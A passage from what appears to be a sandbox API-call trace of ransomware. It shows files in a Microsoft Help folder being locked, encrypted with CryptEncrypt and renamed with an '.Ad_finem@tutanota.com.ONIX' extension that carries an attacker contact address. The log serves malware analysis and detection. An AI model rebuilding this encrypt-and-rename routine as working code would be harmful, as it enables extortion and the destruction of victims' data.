hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x146, lpOverlapped=0x0) returned 1 [0122.181] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x146, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.181] CloseHandle (hObject=0x4d0) returned 1 [0122.182] GetProcessHeap () returned 0x410000 [0122.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.182] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.184] GetProcessHeap () returned 0x410000 [0122.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.184] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bf5d790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSPUB.14.1033.hxn", cAlternateFileName="MSMSPU~1.HXN")) returned 1 [0122.184] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.185] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.185] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x146, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.185] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.185] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.186] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.186] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.186] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.186] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned 55 [0122.186] GetProcessHeap () returned 0x410000 [0122.186] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x44faf8 [0122.186] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" [0122.186] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.186] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=326) returned 1 [0122.186] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x146 [0122.186] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.186] GetProcessHeap () returned 0x410000 [0122.186] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.186] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.186] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.188] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.193] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.195] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x146) returned 0x442938 [0122.195] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x146) returned 0x46a0f0 [0122.195] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.195] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x146, lpOverlapped=0x0) returned 1 [0122.195] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.195] WriteFile (in: hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x146, lpOverlapped=0x0) returned 1 [0122.196] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x146, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.196] CloseHandle (hObject=0x4d0) returned 1 [0122.197] GetProcessHeap () returned 0x410000 [0122.197] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.197] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.200] GetProcessHeap () returned 0x410000 [0122.200] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.200] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bf5d790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSPUB.DEV.14.1033.hxn", cAlternateFileName="MSMSPU~2.HXN")) returned 1 [0122.200] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.201] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.201] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x15e, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.201] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.201] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.201] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.201] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.201] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.201] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned 59 [0122.202] GetProcessHeap () returned 0x410000 [0122.202] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe6) returned 0x467908 [0122.202] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" [0122.202] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.202] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=350) returned 1 [0122.202] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x15e [0122.202] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.202] GetProcessHeap () returned 0x410000 [0122.202] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.202] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.202] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.205] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.206] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.209] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15e) returned 0x44faf8 [0122.209] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15e) returned 0x442938 [0122.209] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.209] ReadFile (in: hFile=0x4d0, lpBuffer=0x44faf8, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x44faf8*, lpNumberOfBytesRead=0x367f44c*=0x15e, lpOverlapped=0x0) returned 1 [0122.209] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.209] WriteFile (in: hFile=0x4d0, lpBuffer=0x442938*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesWritten=0x367f44c*=0x15e, lpOverlapped=0x0) returned 1 [0122.210] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x15e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.210] CloseHandle (hObject=0x4d0) returned 1 [0122.211] GetProcessHeap () returned 0x410000 [0122.211] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.211] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.213] GetProcessHeap () returned 0x410000 [0122.213] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0122.213] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x14c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSTORE.14.1033.hxn", cAlternateFileName="MSMSTO~1.HXN")) returned 1 [0122.213] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.213] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.213] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x14c, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.213] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.213] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.214] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.214] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.214] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.214] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned 56 [0122.214] GetProcessHeap () returned 0x410000 [0122.214] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe0) returned 0x44faf8 [0122.214] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" [0122.214] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.214] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=332) returned 1 [0122.214] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x14c [0122.214] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.214] GetProcessHeap () returned 0x410000 [0122.214] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.214] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.214] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.218] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.219] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.220] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14c) returned 0x442938 [0122.220] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14c) returned 0x46a0f0 [0122.220] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.220] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x14c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x14c, lpOverlapped=0x0) returned 1 [0122.220] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-332, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.220] WriteFile (in: hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x14c, lpOverlapped=0x0) returned 1 [0122.222] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x14c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.222] CloseHandle (hObject=0x4d0) returned 1 [0122.222] GetProcessHeap () returned 0x410000 [0122.222] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.222] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.224] GetProcessHeap () returned 0x410000 [0122.224] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.225] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OIS.14.1033.hxn", cAlternateFileName="MSOIS1~1.HXN")) returned 1 [0122.225] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.225] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.225] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x13a, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.225] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.225] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.225] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.225] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.225] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.226] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn") returned 53 [0122.226] GetProcessHeap () returned 0x410000 [0122.226] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xda) returned 0x44faf8 [0122.226] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" [0122.226] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.226] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=314) returned 1 [0122.226] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x13a [0122.226] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.226] GetProcessHeap () returned 0x410000 [0122.226] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.226] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.226] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.228] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.229] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.230] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x13a) returned 0x4647b0 [0122.230] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x13a) returned 0x464668 [0122.230] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.231] ReadFile (in: hFile=0x4d0, lpBuffer=0x4647b0, nNumberOfBytesToRead=0x13a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4647b0*, lpNumberOfBytesRead=0x367f44c*=0x13a, 